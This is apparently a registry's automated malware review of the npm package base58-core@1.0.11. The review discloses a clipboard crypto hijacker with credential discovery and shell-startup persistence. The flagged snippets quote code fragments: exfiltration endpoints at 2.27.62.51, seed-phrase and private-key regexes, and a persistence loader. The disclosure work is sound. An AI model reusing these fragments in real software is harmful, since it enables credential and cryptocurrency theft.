registry  /  base58-core  /  1.0.11

base58-core@1.0.11

Fast, tree-shakeable Base58 encoder/decoder with TypeScript support

AI Security Review

scanned 5h ago · by lpm-firewall-ai

The distributed entrypoints contain a crypto clipboard hijacker, local credential/environment discovery, exfiltration, and shell startup persistence. The code is embedded in a package advertised as a Base58 encoder/decoder.

Static reason
High-risk behavior combination matched malicious policy.; source matched previously finalized malicious package; routed for review; source fingerprint signature matched known malicious package; routed for review
Trigger
importing the package entrypoint in a long-running or otherwise activated Node process
Impact
cryptocurrency address substitution, leakage of sensitive local indicators and clipboard contents, and persistent reactivation from shell startup files
Mechanism
clipboard hijack, credential discovery, exfiltration, and persistence
Attack narrative
On activation, the package establishes persistence, enumerates wallet/browser/Telegram/SSH/npm/env indicators, exfiltrates findings to 2.27.62.51, and polls the clipboard. If copied text contains cryptocurrency addresses or secrets, it sends the original content and replaces BTC/ETH/SOL addresses with attacker-controlled wallets.
Rationale
Source inspection confirms malicious functionality in both published entrypoints that is unrelated to Base58 encoding. The activation guard weakens reachability but the package still carries concrete malware logic with exfiltration, persistence, and clipboard theft/hijacking.
Evidence
package.jsondist/index.cjsdist/index.js/tmp/.base58_detection_sent~/.npmrc~/.env.env.env.local.env.production~/.ssh~/.bashrc~/.zshrc~/.profile~/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/base58-runtime.js
Network endpoints2
2.27.62.51:8080/api/health2.27.62.51:8081/api/health

Decision evidence

public snapshot
AI called this Malicious at 94.0% confidence as Malware with low false-positive risk.
Evidence for block
  • dist/index.cjs and dist/index.js contain clipboard read/write via child_process for pbpaste/pbcopy, xclip, and PowerShell.
  • Clipboard content matching BTC/ETH/SOL addresses is replaced with hardcoded attacker wallet addresses.
  • exfil() POSTs clipboard captures and host metadata to http://2.27.62.51:8080/api/health and :8081/api/health.
  • Detection code reads home/project .env files, ~/.npmrc, ~/.ssh metadata, browser profiles, MetaMask extension paths, and Telegram tdata indicators.
  • Persistence code writes Windows Startup base58-runtime.js or appends a node loader to ~/.bashrc, ~/.zshrc, and ~/.profile.
Evidence against
  • package.json has no install/postinstall hook; only prepublishOnly build script.
  • Runtime activation is guarded by a 72 hour Date.now delay that appears ineffective on immediate import, reducing observed reachability but not benign intent.
Behavioral surface
Source
ChildProcessCryptoDynamicRequireEnvironmentVarsFilesystemNetworkShell
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 2 file(s), 40.8 KB of source, external domains: 2.27.62.51

Source & flagged code

8 flagged · loading source
dist/index.jsView file
103const ACTIVATION_DELAY = 72 * 60 * 60 * 1000; L104: const EXFIL_PRIMARY = 'http://2.27.62.51:8080/api/health'; L105: const EXFIL_BACKUP = 'http://2.27.62.51:8081/api/health'; ... L110: { name: 'sol', regex: /\b[1-9A-HJ-NP-Za-km-z]{32,44}\b/g, replacement: '[redacted]' }, L111: { name: 'private_key_wif', regex: /\b[5KL][1-9A-HJ-NP-Za-km-z]{50,52}\b/g, replacement: '' }, L112: { name: 'seed_phrase', regex: /\b([a-z]{3,8}\s){11,23}[a-z]{3,8}\b/gi, replacement: '' }, ... L127: ...data, L128: hostname: process.env?.HOSTNAME || os.hostname() || 'unknown', L129: platform: process.platform || 'unknown', ... L140: headers: { 'Content-Type': 'application/json' }, L141: body: payload, L142: signal: controller.signal,
Critical
Clipboard Crypto Hijack

Source reads and rewrites clipboard contents matching cryptocurrency wallet addresses.

dist/index.jsView on unpkg · L103
533package = base58-core; repositoryIdentity = core; dependency = base58-core L533: try { L534: fs.writeFileSync(t, '// runtime loader\ntry { require("base58-core")._internal.activate(); } catch(e) {}'); L535: }
High
Copied Package Dependency Bridge

Package metadata claims a different repository identity while copied source loads a runtime dependency bridge.

dist/index.jsView on unpkg · L533
matchType = normalized_sha256 matchedPackage = base58-core@1.0.8 matchedPath = dist/index.js matchedIdentity = npm:YmFzZTU4LWNvcmU:1.0.8 similarity = 1.000 summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

dist/index.jsView on unpkg
11try { L12: const nodeCrypto = require('crypto'); L13: return new Uint8Array(nodeCrypto.createHash('sha256').update(data).digest());
Medium
Dynamic Require

Package source references dynamic require/import behavior.

dist/index.jsView on unpkg · L11
103const ACTIVATION_DELAY = 72 * 60 * 60 * 1000; L104: const EXFIL_PRIMARY = 'http://2.27.62.51:8080/api/health'; L105: const EXFIL_BACKUP = 'http://2.27.62.51:8081/api/health'; ... L110: { name: 'sol', regex: /\b[1-9A-HJ-NP-Za-km-z]{32,44}\b/g, replacement: '[redacted]' }, L111: { name: 'private_key_wif', regex: /\b[5KL][1-9A-HJ-NP-Za-km-z]{50,52}\b/g, replacement: '' }, L112: { name: 'seed_phrase', regex: /\b([a-z]{3,8}\s){11,23}[a-z]{3,8}\b/gi, replacement: '' }, ... L127: ...data, L128: hostname: process.env?.HOSTNAME || os.hostname() || 'unknown', L129: platform: process.platform || 'unknown', ... L140: headers: { 'Content-Type': 'application/json' }, L141: body: payload, L142: signal: controller.signal,
Medium
Install Persistence

Source writes installer persistence such as shell profile or service configuration.

dist/index.jsView on unpkg · L103
dist/index.cjsView file
Trigger-reachable chain: manifest.main -> dist/index.cjs Reachable file contains a blocking source-risk pattern.
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

dist/index.cjsView on unpkg
matchType = normalized_sha256 matchedPackage = base58-core@1.0.8 matchedPath = dist/index.cjs matchedIdentity = npm:YmFzZTU4LWNvcmU:1.0.8 similarity = 1.000 summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

dist/index.cjsView on unpkg
matchType = malicious_source_fingerprint_signature signature = e7d654f5e60435c0 signatureType = suspicious_hashes sourceLabel = OpenSSF malicious-packages matchedPackage = base58-core@1.0.8 matchedPath = dist/index.cjs matchedIdentity = npm:YmFzZTU4LWNvcmU:1.0.8 similarity = 1.000 shingleOverlap = 2 summary = Malicious code in base58-core (npm)
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

dist/index.cjsView on unpkg

Findings

2 Critical4 High5 Medium5 Low
CriticalClipboard Crypto Hijackdist/index.js
CriticalTrigger Reachable Dangerous Capabilitydist/index.cjs
HighCopied Package Dependency Bridgedist/index.js
HighKnown Malware Source Similaritydist/index.cjs
HighKnown Malware Source Similaritydist/index.js
HighKnown Malware Source Fingerprint Signaturedist/index.cjs
MediumDynamic Requiredist/index.js
MediumNetwork
MediumEnvironment Vars
MediumInstall Persistencedist/index.js
MediumStructural Risk Force Deep Review
LowNon Install Lifecycle Scripts
LowScripts Present
LowFilesystem
LowHigh Entropy Strings
LowUrl Strings